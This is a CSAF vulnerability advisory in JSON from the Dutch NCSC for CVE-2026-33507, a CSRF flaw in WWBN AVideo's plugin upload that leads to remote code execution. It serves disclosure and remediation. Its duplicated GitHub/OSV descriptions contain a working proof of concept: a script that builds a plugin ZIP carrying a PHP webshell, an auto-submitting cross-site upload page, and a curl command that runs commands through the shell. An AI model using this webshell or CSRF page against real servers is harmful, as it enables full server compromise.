{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33507",
        "tracking": {
            "current_release_date": "2026-03-26T00:51:32.412518Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33507",
            "initial_release_date": "2026-03-20T22:41:56.509677Z",
            "revision_history": [
                {
                    "date": "2026-03-20T22:41:56.509677Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T22:42:04.055468Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-24T07:05:33.940520Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T07:05:35.581075Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T07:42:06.504727Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1).| Unknown change."
                },
                {
                    "date": "2026-03-24T07:42:09.596581Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:51:46.462468Z",
                    "number": "7",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-24T20:51:49.888872Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T21:37:23.116619Z",
                    "number": "9",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-24T21:37:28.328120Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T21:02:02.402979Z",
                    "number": "11",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-25T21:02:05.846059Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:49:52.592269Z",
                    "number": "13",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "13"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=26.0",
                                "product": {
                                    "name": "vers:unknown/<=26.0",
                                    "product_id": "CSAFPID-5893889",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.4",
                                "product": {
                                    "name": "vers:unknown/10.4",
                                    "product_id": "CSAFPID-5656122",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.8",
                                "product": {
                                    "name": "vers:unknown/10.8",
                                    "product_id": "CSAFPID-5656123",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11",
                                "product": {
                                    "name": "vers:unknown/11",
                                    "product_id": "CSAFPID-5656124",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1",
                                "product": {
                                    "name": "vers:unknown/11.1",
                                    "product_id": "CSAFPID-5656125",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1.1",
                                "product": {
                                    "name": "vers:unknown/11.1.1",
                                    "product_id": "CSAFPID-5656126",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.5",
                                "product": {
                                    "name": "vers:unknown/11.5",
                                    "product_id": "CSAFPID-5656127",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.6",
                                "product": {
                                    "name": "vers:unknown/11.6",
                                    "product_id": "CSAFPID-5656128",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/12.4",
                                "product": {
                                    "name": "vers:unknown/12.4",
                                    "product_id": "CSAFPID-5656129",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@12.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3",
                                "product": {
                                    "name": "vers:unknown/14.3",
                                    "product_id": "CSAFPID-5656130",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3.1",
                                "product": {
                                    "name": "vers:unknown/14.3.1",
                                    "product_id": "CSAFPID-5656131",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.4",
                                "product": {
                                    "name": "vers:unknown/14.4",
                                    "product_id": "CSAFPID-5656132",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/18.0",
                                "product": {
                                    "name": "vers:unknown/18.0",
                                    "product_id": "CSAFPID-5656133",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@18.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/21.0",
                                "product": {
                                    "name": "vers:unknown/21.0",
                                    "product_id": "CSAFPID-5721197",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@21.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/22.0",
                                "product": {
                                    "name": "vers:unknown/22.0",
                                    "product_id": "CSAFPID-5772271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@22.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/24.0",
                                "product": {
                                    "name": "vers:unknown/24.0",
                                    "product_id": "CSAFPID-5772272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@24.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/25.0",
                                "product": {
                                    "name": "vers:unknown/25.0",
                                    "product_id": "CSAFPID-5840723",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@25.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/26.0",
                                "product": {
                                    "name": "vers:unknown/26.0",
                                    "product_id": "CSAFPID-5878928",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@26.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=26.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<=26.0",
                                    "product_id": "CSAFPID-5878929"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "avideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33507",
            "cwe": {
                "id": "CWE-352",
                "name": "Cross-Site Request Forgery (CSRF)"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server.\n\n## Details\n\nThe root cause has two components working together:\n\n**1. SameSite=None on session cookies (`objects/include_config.php:134-137`):**\n\n```php\nif ($isHTTPS) {\n    ini_set('session.cookie_samesite', 'None');\n    ini_set('session.cookie_secure', '1');\n}\n```\n\nThis explicitly allows browsers to include the session cookie on cross-origin requests to the AVideo instance.\n\n**2. No CSRF protection on pluginImport.json.php (`objects/pluginImport.json.php:18`):**\n\n```php\nif (!User::isAdmin()) {\n    $obj->msg = \"You are not admin\";\n    die(json_encode($obj));\n}\n```\n\nThe endpoint only checks `User::isAdmin()` via the session. There is:\n- No CSRF token validation (the `verifyToken`/`globalToken` mechanism used elsewhere is absent)\n- No `allowOrigin()` call (contrast with `objects/videoAddNew.json.php` which calls `allowOrigin()` at line 8)\n- No `Referer` or `Origin` header validation\n- No requirement for custom headers (e.g., `X-Requested-With`)\n\nThe upload form at `view/managerPluginUpload.php` also contains no CSRF token — it's a plain `<form enctype=\"multipart/form-data\">` with a file input.\n\n**Why the attack bypasses CORS preflight:** `multipart/form-data` is a CORS-safelisted Content-Type, so a `fetch()` call with `mode: 'no-cors'` and `credentials: 'include'` sends the request directly without an OPTIONS preflight. 
The attacker cannot read the response, but the side effect — plugin installation and PHP file extraction to the web-accessible `plugin/` directory — is the objective.\n\n**Why secondary PHP files are not validated:** The ZIP validation (lines 67-152) thoroughly checks for path traversal, dangerous extensions (`.phtml`, `.phar`, `.sh`, etc.), and verifies the main plugin file extends `PluginAbstract`. However, `.php` is intentionally not in the `dangerousExtensions` list (it's a plugin system), and only the main file (`PluginName/PluginName.php`) is checked for the `PluginAbstract` pattern. Any additional `.php` files in the ZIP are extracted without content inspection.\n\n## PoC\n\n**Step 1: Create the malicious plugin ZIP**\n\n```bash\nmkdir -p EvilPlugin\n# Main file — passes PluginAbstract validation\ncat > EvilPlugin/EvilPlugin.php << 'PLUG'\n<?php\nclass EvilPlugin extends PluginAbstract {\n    public function getTags() { return array(); }\n    public function getDescription() { return \"test\"; }\n    public function getName() { return \"EvilPlugin\"; }\n    public function getUUID() { return \"evil-0000-0000-0000\"; }\n    public function getPluginVersion() { return \"1.0\"; }\n    public function getEmptyDataObject() { return new stdClass(); }\n}\nPLUG\n\n# Secondary file — webshell, NOT checked for PluginAbstract\ncat > EvilPlugin/cmd.php << 'SHELL'\n<?php if(isset($_GET['c'])) system($_GET['c']); ?>\nSHELL\n\nzip -r evil-plugin.zip EvilPlugin/\n```\n\n**Step 2: Host the CSRF exploit page**\n\n```html\n<!DOCTYPE html>\n<html>\n<body>\n<h1>Loading...</h1>\n<script>\n// Minimal ZIP with EvilPlugin/EvilPlugin.php and EvilPlugin/cmd.php\n// In practice, the attacker would embed the base64-encoded ZIP bytes here\nasync function exploit() {\n    const zipResp = await fetch('evil-plugin.zip');\n    const zipBlob = await zipResp.blob();\n\n    const formData = new FormData();\n    formData.append('input-b1', zipBlob, 'evil-plugin.zip');\n\n    
fetch('https://TARGET_AVIDEO_INSTANCE/objects/pluginImport.json.php', {\n        method: 'POST',\n        body: formData,\n        mode: 'no-cors',\n        credentials: 'include'\n    });\n}\nexploit();\n</script>\n</body>\n</html>\n```\n\n**Step 3: Admin visits attacker's page while logged into AVideo over HTTPS**\n\nThe browser sends the multipart/form-data POST with the admin's `PHPSESSID` cookie (allowed by `SameSite=None`). The server processes the upload, validates the ZIP structure, and extracts it to `plugin/EvilPlugin/`.\n\n**Step 4: Attacker accesses the webshell**\n\n```bash\ncurl 'https://TARGET_AVIDEO_INSTANCE/plugin/EvilPlugin/cmd.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\n- **Remote Code Execution:** An unauthenticated attacker achieves arbitrary OS command execution on the AVideo server by exploiting a logged-in admin's session.\n- **Full server compromise:** The webshell runs as the web server user (`www-data`), enabling data exfiltration, lateral movement, database access, and further privilege escalation.\n- **No attacker account needed:** The attacker requires zero privileges on the target system — only that an admin visits a page they control.\n- **Stealth:** The attack is invisible to the admin (fire-and-forget side-effect request). The `no-cors` mode means no visible error or redirect.\n\n## Recommended Fix\n\n**1. Add CSRF token validation to `objects/pluginImport.json.php`** (primary fix):\n\n```php\n// After the isAdmin() check at line 18, add:\nif (!User::isAdmin()) {\n    $obj->msg = \"You are not admin\";\n    die(json_encode($obj));\n}\n\n// Add CSRF protection\nallowOrigin();\n\n// Also validate a CSRF token\nif (empty($_POST['globalToken']) || !verifyToken($_POST['globalToken'])) {\n    $obj->msg = \"Invalid CSRF token\";\n    die(json_encode($obj));\n}\n```\n\n**2. 
Update the upload form in `view/managerPluginUpload.php`** to include the token:\n\n```html\n<form enctype=\"multipart/form-data\">\n    <input type=\"hidden\" name=\"globalToken\" value=\"<?php echo getToken(); ?>\">\n    <input id=\"input-b1\" name=\"input-b1\" type=\"file\" class=\"\">\n</form>\n```\n\nAnd pass it in the JavaScript upload config:\n\n```javascript\n$('#input-b1').fileinput({\n    uploadUrl: webSiteRootURL + 'objects/pluginImport.json.php',\n    uploadExtraData: { globalToken: $('input[name=globalToken]').val() },\n    // ...\n});\n```\n\n**3. Consider changing `SameSite=None` to `SameSite=Lax`** unless cross-origin cookie inclusion is specifically required for application functionality. `Lax` prevents cross-site POST requests from including cookies, which would mitigate this and similar CSRF vectors application-wide.",
                    "title": "github - https://api.github.com/advisories/GHSA-hv36-p4w4-6vmj"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server. Commit d1bc1695edd9ad4468a48cea0df6cd943a2635f3 contains a patch.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33507"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server. Commit d1bc1695edd9ad4468a48cea0df6cd943a2635f3 contains a patch.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33507.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `objects/pluginImport.json.php` endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting `session.cookie_samesite = 'None'` for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server.\n\n## Details\n\nThe root cause has two components working together:\n\n**1. SameSite=None on session cookies (`objects/include_config.php:134-137`):**\n\n```php\nif ($isHTTPS) {\n    ini_set('session.cookie_samesite', 'None');\n    ini_set('session.cookie_secure', '1');\n}\n```\n\nThis explicitly allows browsers to include the session cookie on cross-origin requests to the AVideo instance.\n\n**2. No CSRF protection on pluginImport.json.php (`objects/pluginImport.json.php:18`):**\n\n```php\nif (!User::isAdmin()) {\n    $obj->msg = \"You are not admin\";\n    die(json_encode($obj));\n}\n```\n\nThe endpoint only checks `User::isAdmin()` via the session. There is:\n- No CSRF token validation (the `verifyToken`/`globalToken` mechanism used elsewhere is absent)\n- No `allowOrigin()` call (contrast with `objects/videoAddNew.json.php` which calls `allowOrigin()` at line 8)\n- No `Referer` or `Origin` header validation\n- No requirement for custom headers (e.g., `X-Requested-With`)\n\nThe upload form at `view/managerPluginUpload.php` also contains no CSRF token — it's a plain `<form enctype=\"multipart/form-data\">` with a file input.\n\n**Why the attack bypasses CORS preflight:** `multipart/form-data` is a CORS-safelisted Content-Type, so a `fetch()` call with `mode: 'no-cors'` and `credentials: 'include'` sends the request directly without an OPTIONS preflight. 
The attacker cannot read the response, but the side effect — plugin installation and PHP file extraction to the web-accessible `plugin/` directory — is the objective.\n\n**Why secondary PHP files are not validated:** The ZIP validation (lines 67-152) thoroughly checks for path traversal, dangerous extensions (`.phtml`, `.phar`, `.sh`, etc.), and verifies the main plugin file extends `PluginAbstract`. However, `.php` is intentionally not in the `dangerousExtensions` list (it's a plugin system), and only the main file (`PluginName/PluginName.php`) is checked for the `PluginAbstract` pattern. Any additional `.php` files in the ZIP are extracted without content inspection.\n\n## PoC\n\n**Step 1: Create the malicious plugin ZIP**\n\n```bash\nmkdir -p EvilPlugin\n# Main file — passes PluginAbstract validation\ncat > EvilPlugin/EvilPlugin.php << 'PLUG'\n<?php\nclass EvilPlugin extends PluginAbstract {\n    public function getTags() { return array(); }\n    public function getDescription() { return \"test\"; }\n    public function getName() { return \"EvilPlugin\"; }\n    public function getUUID() { return \"evil-0000-0000-0000\"; }\n    public function getPluginVersion() { return \"1.0\"; }\n    public function getEmptyDataObject() { return new stdClass(); }\n}\nPLUG\n\n# Secondary file — webshell, NOT checked for PluginAbstract\ncat > EvilPlugin/cmd.php << 'SHELL'\n<?php if(isset($_GET['c'])) system($_GET['c']); ?>\nSHELL\n\nzip -r evil-plugin.zip EvilPlugin/\n```\n\n**Step 2: Host the CSRF exploit page**\n\n```html\n<!DOCTYPE html>\n<html>\n<body>\n<h1>Loading...</h1>\n<script>\n// Minimal ZIP with EvilPlugin/EvilPlugin.php and EvilPlugin/cmd.php\n// In practice, the attacker would embed the base64-encoded ZIP bytes here\nasync function exploit() {\n    const zipResp = await fetch('evil-plugin.zip');\n    const zipBlob = await zipResp.blob();\n\n    const formData = new FormData();\n    formData.append('input-b1', zipBlob, 'evil-plugin.zip');\n\n    
fetch('https://TARGET_AVIDEO_INSTANCE/objects/pluginImport.json.php', {\n        method: 'POST',\n        body: formData,\n        mode: 'no-cors',\n        credentials: 'include'\n    });\n}\nexploit();\n</script>\n</body>\n</html>\n```\n\n**Step 3: Admin visits attacker's page while logged into AVideo over HTTPS**\n\nThe browser sends the multipart/form-data POST with the admin's `PHPSESSID` cookie (allowed by `SameSite=None`). The server processes the upload, validates the ZIP structure, and extracts it to `plugin/EvilPlugin/`.\n\n**Step 4: Attacker accesses the webshell**\n\n```bash\ncurl 'https://TARGET_AVIDEO_INSTANCE/plugin/EvilPlugin/cmd.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\n- **Remote Code Execution:** An unauthenticated attacker achieves arbitrary OS command execution on the AVideo server by exploiting a logged-in admin's session.\n- **Full server compromise:** The webshell runs as the web server user (`www-data`), enabling data exfiltration, lateral movement, database access, and further privilege escalation.\n- **No attacker account needed:** The attacker requires zero privileges on the target system — only that an admin visits a page they control.\n- **Stealth:** The attack is invisible to the admin (fire-and-forget side-effect request). The `no-cors` mode means no visible error or redirect.\n\n## Recommended Fix\n\n**1. Add CSRF token validation to `objects/pluginImport.json.php`** (primary fix):\n\n```php\n// After the isAdmin() check at line 18, add:\nif (!User::isAdmin()) {\n    $obj->msg = \"You are not admin\";\n    die(json_encode($obj));\n}\n\n// Add CSRF protection\nallowOrigin();\n\n// Also validate a CSRF token\nif (empty($_POST['globalToken']) || !verifyToken($_POST['globalToken'])) {\n    $obj->msg = \"Invalid CSRF token\";\n    die(json_encode($obj));\n}\n```\n\n**2. 
Update the upload form in `view/managerPluginUpload.php`** to include the token:\n\n```html\n<form enctype=\"multipart/form-data\">\n    <input type=\"hidden\" name=\"globalToken\" value=\"<?php echo getToken(); ?>\">\n    <input id=\"input-b1\" name=\"input-b1\" type=\"file\" class=\"\">\n</form>\n```\n\nAnd pass it in the JavaScript upload config:\n\n```javascript\n$('#input-b1').fileinput({\n    uploadUrl: webSiteRootURL + 'objects/pluginImport.json.php',\n    uploadExtraData: { globalToken: $('input[name=globalToken]').val() },\n    // ...\n});\n```\n\n**3. Consider changing `SameSite=None` to `SameSite=Lax`** unless cross-origin cookie inclusion is specifically required for application functionality. `Lax` prevents cross-site POST requests from including cookies, which would mitigate this and similar CSRF vectors application-wide.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-hv36-p4w4-6vmj.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00064",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.3",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, Is related to CWE-352 (Cross-Site Request Forgery (CSRF)), The value of the most recent EPSS score, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5893889",
                    "CSAFPID-5656122",
                    "CSAFPID-5656123",
                    "CSAFPID-5656124",
                    "CSAFPID-5656125",
                    "CSAFPID-5656126",
                    "CSAFPID-5656127",
                    "CSAFPID-5656128",
                    "CSAFPID-5656129",
                    "CSAFPID-5656130",
                    "CSAFPID-5656131",
                    "CSAFPID-5656132",
                    "CSAFPID-5656133",
                    "CSAFPID-5721197",
                    "CSAFPID-5772271",
                    "CSAFPID-5772272",
                    "CSAFPID-5840723",
                    "CSAFPID-5878928",
                    "CSAFPID-5878929"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-hv36-p4w4-6vmj"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33507"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33507.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-hv36-p4w4-6vmj.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-hv36-p4w4-6vmj"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-hv36-p4w4-6vmj"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/commit/d1bc1695edd9ad4468a48cea0df6cd943a2635f3"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33507"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                        "baseScore": 8.8,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5656122",
                        "CSAFPID-5656123",
                        "CSAFPID-5656124",
                        "CSAFPID-5656125",
                        "CSAFPID-5656126",
                        "CSAFPID-5656127",
                        "CSAFPID-5656128",
                        "CSAFPID-5656129",
                        "CSAFPID-5656130",
                        "CSAFPID-5656131",
                        "CSAFPID-5656132",
                        "CSAFPID-5656133",
                        "CSAFPID-5721197",
                        "CSAFPID-5772271",
                        "CSAFPID-5772272",
                        "CSAFPID-5840723",
                        "CSAFPID-5878928",
                        "CSAFPID-5878929",
                        "CSAFPID-5893889"
                    ]
                }
            ],
            "title": "CVE-2026-33507"
        }
    ]
}